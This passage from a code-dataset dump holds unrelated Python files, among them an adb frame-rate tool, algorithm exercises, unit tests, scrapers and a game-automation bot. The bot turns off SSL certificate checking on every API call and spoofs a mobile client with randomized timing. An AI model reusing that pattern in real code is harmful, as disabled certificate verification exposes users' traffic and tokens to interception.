Results in {}.'.format(dirname))\n","sub_path":"planet4/catalog_production.py","file_name":"catalog_production.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"165718790","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# @author : majunfeng\n# @date : 2021/1/27 17:25\n# @desc : Test collecting the jank-rate metric and FPS value of an Android app\n\nimport subprocess\nimport time\nfrom pprint import pprint\n\nPACKAGE_NAME = 'com.sohu.inputmethod.sogou.xiaomi'\n\n\nclass FPS(object):\n def __init__(self, device_id=None):\n self.device_id = device_id\n self.cmd = f'adb shell dumpsys gfxinfo {PACKAGE_NAME}'\n if self.device_id:\n self.cmd = f'adb -s {self.device_id} shell dumpsys gfxinfo {PACKAGE_NAME}'\n self.result = None\n\n def set_deviceid(self, device_id):\n self.device_id = device_id\n\n def calculate(self, frames):\n \"\"\"\n Compute the sync frame rate and jank rate of the current view; every frame that takes more than 16.67ms counts as one jank, and each additional 16.67ms implies one more vsync signal, i.e. one dropped frame\n :param frames: the set of data frames of the current view; each frame holds the elapsed time of the draw, prepare, process and execute stages\n :return: the current fps and jank rate\n \"\"\"\n if not frames or not isinstance(frames, list):\n return {}\n jank_times = 0\n vsync_times = 0\n for frame in frames:\n frame = frame.strip()\n draw, prepare, process, execute = frame.strip().split('\\t')\n once_time = float(draw) + float(prepare) + float(process) + float(execute)\n if once_time > 16.67:\n jank_times += 1\n # Count the vsync signals: if a frame has not finished rendering when a signal fires, the old frame is shown, which also means one frame was dropped\n if once_time % 16.67 == 0:\n vsync_times += int(once_time / 16.67) - 1\n else:\n vsync_times += once_time // 16.67\n # theoretical total frames = actual frames + execution time // 16.67\n fps = len(frames) / (len(frames) + vsync_times) * 60\n lost_frame_rate = float(jank_times / len(frames))\n return {\n \"fps\": round(fps, 2),\n \"lost_frame_rate\": str(round(lost_frame_rate * 100, 2)) + '%'\n }\n\n def _parse_stdout(self, content):\n \"\"\"\n Temporary \"brute-force\" parsing of the raw command output\n :param content:\n :return:\n \"\"\"\n start_flag = 'Profile data in ms:'\n end_flag = 'View hierarchy'\n index = content.find(start_flag) + len(start_flag) + 1\n end = content.find(end_flag)\n views_data = content[index: end].strip()\n result = {}\n for view_data in views_data.split('\\r\\n\\r\\n'):\n frames = view_data.split('\\r\\n')\n head = frames[0].strip()\n key = None\n if ':' in head:\n key = head.split(':')[0]\n elif '/' in head:\n key = head.split('/')[0]\n else:\n key = 'unknown'\n result[key] = self.calculate(frames[2:])\n return result\n\n def export(self, content, filename=None):\n if filename is None:\n filename = f'{time.time()}.txt'\n with open(filename, 'a+') as fp:\n fp.write(content)\n\n def _collect_once(self, export=False):\n gfx = subprocess.Popen(self.cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _out = gfx.stdout.read().decode('utf-8')\n if export:\n self.export(_out)\n return self._parse_stdout(_out)\n\n def collect_once(self):\n res = self._collect_once(True)\n self.result = res\n\n def collect_long(self, later_time):\n \"\"\"\n Run continuously for a while, collecting one result per second, and return the list of results\n :param later_time: the execution time to use, in seconds\n :return:\n \"\"\"\n self.result = []\n for i in range(later_time):\n time.sleep(1)\n self.result.append(self._collect_once())\n\n def report(self):\n pprint(self.result)\n return self.result\n\n\nif __name__ == '__main__':\n tester = FPS()\n tester.collect_once()\n # tester.collect_long(20)\n tester.report()\n","sub_path":"android/FPSAnalysis.py","file_name":"FPSAnalysis.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} 
+{"seq_id":"645715748","text":"# Kamergotchi Assistant\n# https://github.com/aolieman/kamergotchi-assistant\n#\n# FORK OF:\n# Kamergotchi Automator\n# https://github.com/MartienB/kamergotchi-automator\n# Developed by: Martien Bonfrer\n# Date: 20/2/17\n\nimport codecs\nimport random\nimport datetime\nimport logging\nimport ssl\nimport sys\nimport time\nimport json\nfrom urllib.error import HTTPError, URLError\nfrom urllib.parse import urlencode, urljoin\nfrom urllib.request import Request, urlopen\nfrom numpy.random import lognormal\nfrom pprint import pformat\nfrom functools import wraps\nfrom operator import itemgetter\n\nfrom secret import PLAYER_ID, SLEEP_INTERVAL, CLAIM_ONLY\n\n\nlogger = logging.getLogger('kamergotchi.player')\nlogger.handlers = []\nlhand = logging.StreamHandler()\nformatter = logging.Formatter(\n '%(asctime)s -- %(message)s',\n \"%Y-%m-%d %H:%M:%S\"\n)\nlhand.setFormatter(formatter)\nlogger.addHandler(lhand)\nlogger.setLevel(logging.INFO)\n\nplayer_token = PLAYER_ID\nbedtime, waketime = SLEEP_INTERVAL\n\nbase_headers = {\n 'User-Agent': \"okhttp/3.4.1\",\n 'Host': \"api.kamergotchi.nl\",\n 'accept': \"application/json, text/plain, */*\",\n 'Connection': \"close\"\n}\n\nlast_action_time = datetime.datetime.utcnow()\n\n\ndef timed_action(func):\n \"\"\"\n Keep track of when the last action was taken\n \"\"\"\n @wraps(func)\n def wrapped_action(*args, **kwargs):\n global last_action_time\n last_action_time = datetime.datetime.utcnow()\n return func(*args, **kwargs)\n \n return wrapped_action\n \n\n\ndef getInfo(player_token, retries=0):\n url = 'https://api.kamergotchi.nl/game'\n headers = base_headers.copy()\n headers['x-player-token'] = player_token\n \n request = Request(url, headers=headers)\n\n # There is something wrong with the ssl certificate, so we just ignore it!\n context = ssl._create_unverified_context()\n try:\n json_resp = urlopen(request, context=context).read().decode()\n except (HTTPError, URLError) as e:\n logger.error('Info Error: {}'.format(e))\n time.sleep(1 + 2 * retries)\n return getInfo(player_token, 1 + retries)\n\n resp_dict = json.loads(json_resp)\n game = resp_dict['game']\n if game.get('quotes'):\n progress(pformat(game['quotes']))\n \n full_health = min(game['current'].values()) == 100\n if not full_health:\n progress(str(game['current']))\n \n game['care_reset_date'] = datetime.datetime.strptime(\n game['careReset'], \n \"%Y-%m-%dT%H:%M:%S.%fZ\"\n )\n game['claim_reset_date'] = datetime.datetime.strptime(\n game['claimReset'], \n \"%Y-%m-%dT%H:%M:%S.%fZ\"\n )\n return game\n\n \ndef giveMostNeededCare(player_token):\n game = getInfo(player_token)\n \n care_left = game['careLeft']\n current = game['current']\n full_health = min(current.values()) == 100\n\n care_reset_date = game['care_reset_date']\n claim_reset_date = game['claim_reset_date']\n utcnow = datetime.datetime.utcnow()\n\n # claim bonus, or give care, or wait for a while\n wait_seconds = 0\n if (CLAIM_ONLY or full_health) and (utcnow > claim_reset_date):\n claimBonus(player_token)\n logger.info(pformat(game))\n elif not (CLAIM_ONLY or full_health) and (care_left > 0 or utcnow > care_reset_date):\n lowest_stat = min(current.items(), key=itemgetter(1))[0]\n giveCare(player_token, lowest_stat)\n elif CLAIM_ONLY or full_health:\n # wait until next action\n wait_seconds = 1\n else:\n # we hit the care limit; try again in about 6 minutes\n wait_seconds = (care_reset_date - utcnow).total_seconds()\n progress('Not yet! 
Remaining seconds: {}'.format(wait_seconds))\n \n return wait_seconds, claim_reset_date\n \n\n@timed_action\ndef claimBonus(player_token):\n context = ssl._create_unverified_context() \n sessionUrl = 'https://api.kamergotchi.nl/game/claim'\n\n headers = base_headers.copy()\n headers['x-player-token'] = player_token\n\n req = Request(sessionUrl, headers=headers, method='POST')\n\n try: \n response = urlopen(req, context=context)\n json_resp = response.read().decode()\n resp_dict = json.loads(json_resp)\n game = resp_dict['game']\n if game.get('quotes'):\n progress(pformat(game['quotes']))\n \n progress('Succesfully claimed bonus!')\n except (HTTPError, URLError) as e:\n logger.error('Claim Error: {}'.format(e))\n except:\n logger.exception('Unexpected Claim Error:')\n\n\n@timed_action\ndef giveCare(player_token, careType): \n context = ssl._create_unverified_context() \n sessionUrl = 'https://api.kamergotchi.nl/game/care'\n reqBody = {'bar' : careType}\n\n data = json.dumps(reqBody, separators=(',', ':')).encode('utf-8')\n\n headers = base_headers.copy()\n headers['x-player-token'] = player_token\n headers['Content-type'] = \"application/json;charset=utf-8\"\n\n req = Request(sessionUrl, data, headers, method='POST')\n\n try: \n response = urlopen(req, context=context)\n json_resp = response.read().decode()\n resp_dict = json.loads(json_resp)\n game = resp_dict['game']\n if game.get('quotes'):\n progress(pformat(game['quotes']))\n\n progress('{} -- Succesfully cared: {}'.format(game['score'], careType))\n except (HTTPError, URLError) as e:\n logger.error('Care Error: {}'.format(e))\n except:\n logger.exception('Unexpected Care Error:')\n\n \ndef progress(msg):\n logger.info(msg)\n \n \ndef utc_to_local(utc_dt):\n return utc_dt.replace(tzinfo=datetime.timezone.utc).astimezone(tz=None)\n \n \ndef sleep_until(wakeup_dt, perturbation):\n utcnow = datetime.datetime.utcnow()\n delta_till = wakeup_dt - utcnow\n if random.random() < 0.67:\n delta_till += datetime.timedelta(seconds=perturbation)\n else:\n delta_till -= datetime.timedelta(seconds=perturbation)\n \n snooze = abs(delta_till.seconds)\n progress('Be back at {:%Y-%m-%d %H:%M:%S}\\n'.format(utc_to_local(utcnow + delta_till)))\n time.sleep(snooze)\n \n \ndef ceil_dt(dt, delta):\n return dt + (datetime.datetime.min - dt) % delta\n \n \ndef get_next_dt(claim_reset_date=None):\n utcnow = datetime.datetime.utcnow()\n next_half_hour = ceil_dt(utcnow, datetime.timedelta(minutes=30))\n \n # stop making requests before the game is over\n if next_half_hour >= datetime.datetime(2017, 3, 11, 23, 00):\n progress('Plenty of cares were given. 
Take care!')\n sys.exit()\n \n # turn a whole hour into the next half hour\n if next_half_hour.minute == 0:\n next_half_hour += datetime.timedelta(minutes=30)\n \n # upcoming claim before next half hour\n if claim_reset_date and utcnow < claim_reset_date < next_half_hour:\n return claim_reset_date\n \n return next_half_hour\n \n\nif __name__ == '__main__':\n # one time next_dt init to 6 minutes ago\n next_dt = datetime.datetime.utcnow() - datetime.timedelta(minutes=6)\n\n while True:\n long_intervals = (lognormal(0, 2, size=10) + 1) * 2\n\n for liv in long_intervals:\n short_intervals = lognormal(0, 1, size=30) / 2\n \n game = getInfo(player_token)\n claim_reset = game['claim_reset_date']\n time.sleep(1 + short_intervals[-1])\n \n utcnow = datetime.datetime.utcnow()\n if bedtime <= utc_to_local(utcnow) < waketime:\n progress(\n 'ZzZzZzZ -- {:%Y-%m-%d %H:%M} <= {:%Y-%m-%d %H:%M} < {:%Y-%m-%d %H:%M}'.format(\n bedtime, utc_to_local(utcnow), waketime\n )\n )\n next_dt = get_next_dt(claim_reset)\n seconds_until_claim = (claim_reset - utcnow).total_seconds()\n max_wait_seconds = 5 * 60\n \n if utcnow > claim_reset or seconds_until_claim <= max_wait_seconds: \n progress('Claim due {:%Y-%m-%d %H:%M:%S}'.format(utc_to_local(claim_reset)))\n else:\n sleep_until(next_dt, random.random() * 4)\n \n wait = 0\n for siv in short_intervals:\n try:\n wait, claim_reset = giveMostNeededCare(player_token)\n if wait:\n break\n except:\n logger.exception('Unexpected issue:')\n progress('Retrying in {} seconds'.format(wait + siv))\n \n time.sleep(wait + siv)\n \n utcnow = datetime.datetime.utcnow()\n \n # keep trying until an action is taken or 9 minutes have passed\n if wait == 1 and (\n (last_action_time > next_dt)\n or (utcnow > next_dt + datetime.timedelta(minutes=9))\n ):\n next_dt = get_next_dt(claim_reset)\n sleep_until(next_dt, liv)\n else:\n snooze = wait + min(liv, 367.67)\n progress('Be back in {} seconds'.format(snooze))\n time.sleep(snooze)\n \n\n","sub_path":"kg-assistant.py","file_name":"kg-assistant.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"33209586","text":"import urllib.request\nimport lxml.html\nfrom lxml.cssselect import CSSSelector\nimport re\n\ndef download(url, user_agent=\"wswp\", num_retries=2):\n print('Downloading:', url)\n #headers = {'User-agent': user_agent}\n #request = urllib.request(url, headers=headers)\n html = urllib.request.urlopen(url).read().decode('utf-8')\n# except urllib.URLError as e:\n# print('Download error:', e.reason)\n# html = None\n# if num_retries > 0:\n# if hasattr(e, 'code') and 500 <= e.code < 600:\n# return download(url, user_agent, num_retries-1)\n return html\n\ndef crawl_sitemap(url):\n sitemap = download(url)\n links = re.findall('<loc>(.*?)</loc>', sitemap)\n for link in links:\n html = download(link)\n if scrape_callback:\n links.extend(scrape_callback(link, html) or [])\ndef scrape_callback(url, html):\n #autor = re.findall('(*.?)', html)\n tree = lxml.html.fromstring(html)\n #fixed_html = lxml.html.tostring(tree, pretty_print=True)\n h4span = tree.cssselect('span.author-content h4')[0]\n posttitle = tree.cssselect('h1.post-title')[0]\n #postheader = tree.cssselect('h1.post-title')[0]\n postcontent = tree.cssselect('section.post-content')[0]\n autor = h4span.text_content()\n print(autor)\n print(posttitle.text_content())\n print(postcontent.text_content())\n #row = [tree.cssselect('table > tr#places_%s__row > td.w2p_fw' % field)[0].text_content() for field 
in FIELDS]\n #print(tree.findall(''))\n\ncrawl_sitemap('https://teonite.com/blog/sitemap-posts.xml')\n","sub_path":"scrapping2.py","file_name":"scrapping2.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"523327135","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom inventory_management.electric_appliances_class import ElectricAppliances\nfrom inventory_management.furniture_class import Furniture\nfrom inventory_management.inventory_class import Inventory\nimport inventory_management.main as main\nfrom inventory_management.market_prices import get_latest_price\n\n\nclass MainTests(TestCase):\n\n def test_main_menu(self):\n with patch ('builtins.input', side_effect ='1'):\n self.assertEqual(main.main_menu(), main.add_new_item)\n with patch ('builtins.input', side_effect ='2'):\n self.assertEqual(main.main_menu(), main.item_info)\n with patch ('builtins.input', side_effect ='q'):\n self.assertEqual(main.main_menu(), main.exit_program)\n\n\n def test_get_price(self):\n self.assertEqual(24, main.get_price())\n\n\n def test_add_new_item(self):\n electric_appliance = [1, \"item\", 5, \"n\", \"y\", \"brand\", 5.5]\n furniture = [1, \"item\", 5, \"y\", \"material\", \"XL\"]\n inventory = [1, \"item\", 5, \"n\", \"n\"]\n\n with patch('builtins.input', side_effect=electric_appliance):\n main.FULL_INVENTORY = {}\n main.add_new_item()\n test_dict = {1: {'product_code': 1, 'description': \"item\", 'market_price': 24,\n 'rental_price': 5, 'brand': \"brand\", 'voltage': 5.5}}\n self.assertEqual(main.FULL_INVENTORY, test_dict)\n\n with patch('builtins.input', side_effect=furniture):\n main.FULL_INVENTORY = {}\n main.add_new_item()\n test_dict = {1: {'product_code': 1, 'description': \"item\", 'market_price': 24,\n 'rental_price': 5, 'material': \"material\", 'size': \"XL\"}}\n self.assertEqual(main.FULL_INVENTORY, test_dict)\n\n with patch('builtins.input', side_effect=inventory):\n main.FULL_INVENTORY = {}\n main.add_new_item()\n test_dict = {1: {'product_code': 1, 'description': \"item\", 'market_price': 24,\n 'rental_price': 5}}\n self.assertEqual(main.FULL_INVENTORY, test_dict)\n\n\n def test_item_info(self):\n expected = \"Item not found in inventory\"\n with patch('builtins.input', side_effect = '1'):\n main.FULL_INVENTORY = {}\n self.assertEqual(print(expected), main.item_info())\n\n test_dict = {'product_code': 1, 'description': \"item\", 'market_price': 5,\n 'rental_price': 5, 'brand': \"brand\", 'voltage': 5.5}\n expected = \"product_code: 1\\ndescription: item\\nmarket_price: 5\\nrental_price: 5\\nbrand: brand\\nvoltage: 5.5\\n\"\n with patch('builtins.input', side_effect = '1'):\n main.FULL_INVENTORY['1'] = test_dict\n self.assertEqual(print(expected), main.item_info())\n\n\n def test_exit_program(self):\n with self.assertRaises(SystemExit):\n main.exit_program()\n\n\nclass ElectricAppliancesTests(TestCase):\n\n def test_return_as_dict(self):\n electric_appliance = ElectricAppliances(1, \"item\", 5, 5, \"brand\", 5.5)\n test_dict = {'product_code': 1, 'description': \"item\", 'market_price': 5,\n 'rental_price': 5, 'brand': \"brand\", 'voltage': 5.5}\n\n self.assertEqual(test_dict, electric_appliance.return_as_dictionary())\n\n\nclass FurnitureTests(TestCase):\n\n def test_return_as_dict(self):\n furniture = Furniture(1, \"item\", 5, 5, \"material\", \"XL\")\n test_dict = {'product_code': 1, 'description': \"item\", 'market_price': 5,\n 'rental_price': 5, 'material': 
\"material\", 'size': \"XL\"}\n\n self.assertEqual(test_dict, furniture.return_as_dictionary())\n\n\nclass InventoryTests(TestCase):\n\n def test_return_as_dict(self):\n inventory = Inventory(1, \"item\", 5, 5)\n test_dict = {'product_code': 1, 'description': \"item\", 'market_price': 5, 'rental_price': 5}\n\n self.assertEqual(test_dict, inventory.return_as_dictionary())\n\n\nclass MarketPriceTests(TestCase):\n\n def test_get_latest_price(self):\n self.assertEqual(24, get_latest_price())\n\n\n","sub_path":"students/bplanica/lesson01/assignment/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"375698486","text":"import heapq\r\n\r\ndef getName():\r\n\treturn \"Kainth, Mayank\"\r\n\r\n# This node structure might be useful to you\r\nclass Node:\r\n def __init__(self,value,data,left=None,right=None):\r\n self.value = value\r\n self.data = data\r\n self.left = left\r\n self.right = right\r\n\r\n def __lt__(self, other):\r\n if self.value < other.value:\r\n return True\r\n return False\r\n\r\n def __le__(self, other):\r\n if self.value <= other.value:\r\n return True\r\n return False\r\n\r\n def __gt__(self, other):\r\n if self.value > other.value:\r\n return True\r\n return False\r\n\r\n def __ge__(self, other):\r\n if self.value >= other.value:\r\n return True\r\n return False\r\n\r\nclass MyHuffman():\r\n\r\n\r\n def build(self, weights):\r\n # Build a huffman tree from the dictionary of character:value pairs\r\n #print(\"Building huffman tree with dictionary {}\".format(weights))\r\n\r\n self.heap = [] # create and empty heap\r\n def printHeap():\r\n for i in self.heap:\r\n print(\"{}/{}\".format(i.value, i.data))\r\n\r\n for i in weights: # poulate heap with leaf nodes\r\n self.heap.append(Node(weights[i], i))\r\n #print(f\"added node {weights[i]}/{i}\")\r\n\r\n heapq.heapify(self.heap)\r\n\r\n\r\n\r\n #printHeap()\r\n\r\n while True:\r\n a = heapq.heappop(self.heap)\r\n b = heapq.heappop(self.heap) if len(self.heap) > 0 else None\r\n sum = a.value + b.value if b is not None else a.value\r\n heapq.heappush(self.heap, Node(sum, None, a, b))\r\n # print(f\"The Node with L:{a.value} and R:{b.value} has been created with value{sum}\")\r\n\r\n if len(self.heap) == 1:\r\n break\r\n\r\n print(\"Finished building Huffman Tree for passed word\")\r\n\r\n def encode(self, word):\r\n # Return the bitstring of word encoded by the rules of your huffman tree\r\n #print(f\"The word that was passed is {word}\")\r\n\r\n self.word = word\r\n dict = {}\r\n for i in word: dict[i] = word.count(i)\r\n #print(f\"Dictionary: {dict}\")\r\n\r\n self.build(dict) #build a huffman tree\r\n self.reference = {} #create a dictionary of references to speed up encoding the word\r\n encodedWord, self.code = \"\", \"\"\r\n\r\n def fillReference(node):\r\n if node.data is not None:\r\n self.reference[node.data] = self.code\r\n\r\n if node.left is not None:\r\n self.code += \"1\"\r\n fillReference(node.left)\r\n self.code = self.code[:-1]\r\n\r\n if node.right is not None:\r\n self.code+=\"0\"\r\n fillReference(node.right)\r\n self.code = self.code[:-1]\r\n\r\n fillReference(self.heap[0])\r\n\r\n for i in word:\r\n encodedWord += self.reference.get(i)\r\n\r\n #print(f\"the bitcode is: {encodedWord}\r\n print(self.reference)\r\n return encodedWord\r\n\r\n\r\n\r\n def decode(self, bitstring):\r\n # Return the word encoded in bitstring, or None if the code is invalid\r\n word = \"\"\r\n\r\n 
#print(f\"decoding {bitstring} using tree from word {self.word}\")\r\n pos = self.heap[0]\r\n\r\n\r\n for i in range(len(bitstring)): #this loop decodes the word by searching through the node\r\n if bitstring[i] == \"0\" and pos.right is not None:\r\n pos = pos.right\r\n elif bitstring[i] == \"1\" and pos.left is not None:\r\n pos = pos.left\r\n else:\r\n return None\r\n\r\n if pos.data is not None:\r\n word += pos.data\r\n pos = self.heap[0]\r\n\r\n print(f\"The decoded word is '{word}'\")\r\n return word\r\n\r\n\r\n\r\n\r\n\r\na = MyHuffman()\r\n","sub_path":"Lab 3/Lab3-Template2.py","file_name":"Lab3-Template2.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"539901730","text":"#https://leetcode.com/problems/two-sum/\n\nfrom typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n dic={}\n for i in range(len(nums)):\n dic[nums[i]]=i\n for i in range(len(nums)):\n s=target-nums[i]\n ind=dic.get(s,-1)\n if ind!=-1 and i!=ind:\n return([i,ind])\n \n ","sub_path":"solutions/1_two_sum.py","file_name":"1_two_sum.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"146781174","text":"from algorithm.calculate import path_nodes\nfrom algorithm.calculate import path_distance_time\nfrom algorithm.calculate import count_charge_cnt\nfrom algorithm.calculate import path_time_info\n\nclass TransportPath(object):\n\n def __init__(self, path, vehicle_id):\n # the real id is assigned later in calc_path_info()\n self.id = None\n self.path = path\n self.vehicle_id = vehicle_id\n self.weight = 0\n self.volume = 0\n self.waiting_tm = 0\n self.distance = 0\n self.trans_cost = 0\n self.start_tm = 0\n self.back_tm = 0\n self.charge_cost = 0\n self.wait_cost = 0\n self.fixed_use_cost = 0\n self.total_cost = 0\n self.charge_cnt = 0\n def calc_path_info(self,individual_id, distance_matrix, time_matrix, vehicle_info, id_sorted_orders, id_type_map):\n # (tp, individual_id, distance_matrix, time_matrix, vehicle_info, id_sorted_orders, id_type_map):\n self.weight = path_nodes(self.path, id_sorted_orders)[0]\n self.volume = path_nodes(self.path, id_sorted_orders)[1]\n self.distance = path_distance_time(self.path, distance_matrix, time_matrix)[0]\n\n t_str = str(1000 + individual_id)\n self.id = \"DP0\" + t_str[1:]\n t_tm = path_time_info(id_sorted_orders, self.path, distance_matrix, time_matrix, vehicle_info[self.vehicle_id - 1],\n id_type_map)\n self.start_tm = t_tm[0]\n self.back_tm = t_tm[1]\n\n self.waiting_tm = t_tm[2]\n self.charge_cnt = count_charge_cnt(self.path)\n\n if self.vehicle_id == 2:\n self.trans_cost = self.distance * 0.014\n else:\n self.trans_cost = self.distance * 0.012\n self.wait_cost = self.waiting_tm / 60 * 24\n self.charge_cost = self.charge_cnt * 50\n if self.vehicle_id == 2:\n self.fixed_use_cost = 300\n else:\n self.fixed_use_cost = 200\n # total cost = transport cost + waiting cost + charging cost + fixed cost\n self.total_cost = self.trans_cost + self.wait_cost + self.charge_cost + self.fixed_use_cost\n return self\n\n def to_list(self):\n \"\"\"Customize this function's behavior as needed\"\"\"\n return [self.id, self.vehicle_id, self.path, self.start_tm,self.back_tm,self.distance,\n self.trans_cost, self.charge_cost, self.wait_cost,self.fixed_use_cost,self.total_cost,\n self.charge_cnt, self.weight, 
self.volume]","sub_path":"entity/TransportPath.py","file_name":"TransportPath.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"185152869","text":"import numpy as np\nimport scipy.io as sio\nimport pyphi\nimport time\nfrom ising import gen_reservoir\nimport matplotlib.pyplot as plt\n\nnetwork = input('Network: ')\nmethod = input('Method: ')\n\n# filename = '/Ising_random_' + network #'Ising_Phi_DMN' \nfilename = '/Ising_' + method + '_1' #'Ising_met_1' \ndirectory = 'Parallel Code Stuff/Simulations/Ising_Networks/'\nwd = 'Current_Sims/' + network + '/'\n\nmat = sio.loadmat(directory + wd + method + filename + '.mat')\n\nT = mat['temp']\nJ = mat['J']\nJ = J!=0\nspinBin = mat['spinBin']\n#S = mat['EXPORT'] # spin time-series through temperature\nM = np.array(gen_reservoir(J.shape[1]),dtype='uint8')\n\nTPM = mat['TPM']\n\ntemplen = T.shape[1]\nprint('The number of data points to calculate Phi for is ' + str(templen))\n\ntempstart = input('Start from data point: ')\ntempstart = int(tempstart)\n\ntempend = input('End at data point: ')\ntempend = int(tempend)\n\nincrement = input('Increment every _ data points: ')\nincrement = int(increment)\n\nsuffix = input('Filename suffix: ')\n\nnumStates = M.shape[0]\n\nind = np.arange(tempstart,tempend,increment) # indices of data points that phi will be calculated for\nT2 = T[0,ind]\n\nlooplen = ind.shape[0] # number of iterations of loop\n\n# phi = np.zeros([numStates,templen])\nphi = np.zeros([numStates,looplen])\nphiSqr = np.zeros([numStates,looplen])\ncount = 0\n\nprint('Calculating...')\nfor temp in range(tempstart,tempend,increment):\n print( ((temp)/(tempend - tempstart))*100,\"% Complete\")\n for state in range(numStates): #numflips\n if spinBin[state,temp] != 0:\n start = time.time()\n #print(\"Starting state \", M[state,:], \"at temp. 
\", T[0,temp])\n network = pyphi.Network(TPM[:,:,temp], connectivity_matrix=J)\n #subsystem = pyphi.Subsystem(network, S[:,state,temp], range(network.size))\n subsystem = pyphi.Subsystem(network, M[state,:], range(network.size))\n #print(subsystem)\n phi[state,count] = pyphi.compute.big_phi(subsystem)\n phiSqr[state,count] = phi[state,count]*phi[state,count]\n print(\"Phi = \", phi[state,count])\n #input()\n end = time.time()\n #print(end - start, \"seconds elapsed\")\n count += 1\n\n\nphiSum = np.sum(phi*spinBin[:,ind],0)\nphiSqrSum = np.sum(phiSqr*spinBin[:,ind],0)\n\nphiSus = (phiSqrSum - phiSum*phiSum)/(T2*J.shape[0])\n#print('Done!')\n\nnp.savez(directory + 'pyPhi/' + filename + '_' + suffix ,phiSum = phiSum,phiSus = phiSus,T2 = T2)\n\nplt.plot(T2,phiSum,\"o\")\nplt.plot(T2,phiSum,\"o\")\nplt.show()\n","sub_path":"meanPhi_testing_stuff.py","file_name":"meanPhi_testing_stuff.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"462745299","text":"#!/usr/bin/env python\nfrom pylab import *\nfrom scipy.io import mmread\n\nA = mmread('Serena.mtx')\n\nfig, (ax1, ax2) = subplots(2, 1, sharex=True, figsize=(8,10), gridspec_kw=dict(height_ratios=[4,1]))\nax1.spy(A, marker='.', markersize=0.25, alpha=0.2)\naxins = ax1.inset_axes([0.55, 0.55, 0.4, 0.4])\naxins.spy(A, marker='o', markersize=3, alpha=0.5)\nn = (A.shape[0] // 3 // 3) * 3\naxins.set_xlim([n - 0.5, n + 44.5])\naxins.set_ylim([n - 0.5, n + 44.5])\naxins.invert_yaxis()\naxins.set_xticklabels('')\naxins.set_yticklabels('')\nax1.indicate_inset_zoom(axins)\n\nax2.semilogy(A.diagonal())\nax2.set_ylabel('Diagonal')\n\ntight_layout()\nsavefig('Serena.png')\n","sub_path":"tutorial/2.Serena/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"619803720","text":"\nfrom typing import List\n\n\"\"\" core of this problem is to find the largest difference between two elements (may be the same element) \nin an unsorted array. \nO(n^2) if I scan from left to right and put 'buy' pointer on each index.\nO(n) if I scan beforehand to compute maximum sell price in prices[i:] and \nsecond pass to determine maximum difference. \n\nO(n) one pass: keep track of highest peak after lowest trough\nkeep track of minimum_price so far and maximum profit so far. \n\"\"\"\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if not prices:\n return 0\n minimum_price = prices[0]\n maximum_profit = 0\n for i in prices:\n minimum_price = min(i,minimum_price)\n tprofit = i - minimum_price\n maximum_profit = max(tprofit, maximum_profit)\n return maximum_profit\n \n\n # best_sell = [prices[-1] for i in range(len(prices))]\n # # dp \n # for i in range(len(best_sell) - 2, -1, -1):\n # best_sell[i] = max(prices[i],best_sell[i+1])\n # diff = 0\n # for ind,val in enumerate(prices):\n # temp = best_sell[ind] - val\n # if temp > diff:\n # diff = temp\n # return diff\n\na = [7,1,5,3,6,4]\nprint(Solution().maxProfit(a))","sub_path":"121. Best Time to Buy and Sell Stock.py","file_name":"121. 
Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"631190018","text":"import unittest\r\n\r\nfrom pteromyini.interpreter.xpath import XPath\r\n\r\n\r\nclass TestXpath(unittest.TestCase):\r\n\r\n def test_execute(self):\r\n xpath = XPath([\"@c\", '\"over text\"'])\r\n xpath = XPath([\"a\", \"@b\", '~\"some text\"', xpath])\r\n print(xpath)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"custom_library/pteromyini/pteromyini/interpreter/test/test_xpath.py","file_name":"test_xpath.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"34076450","text":"import csv\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport nltk\nnltk.download(\"vader_lexicon\")\n\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\nDOWNLOAD_URL = 'https://www.imdb.com/title/tt0468569/reviews?ref_=tt_urv'\n\n\ndef download_page(url):\n\n return urllib.request.urlopen(url)\n\n# print(download_page(DOWNLOAD_URL).read())\n\n\ndef parse_html(html):\n \"\"\"\n Read the data from IMDB and write it to a csv. Also add a \"sentiment\" column that shows the overall sentiment of each review \n \"\"\"\n soup = BeautifulSoup(html, features=\"lxml\")\n movie_table = soup.find('div', attrs={'class': 'lister-list'})\n review_list = []\n for divs in movie_table.find_all('div', attrs={\"class\": \"lister-item mode-detail imdb-user-review collapsable\"}):\n movie_rating = divs.find('div', attrs={'class': 'ipl-ratings-bar'})\n rating_container = movie_rating.find(\"span\", attrs={'class': 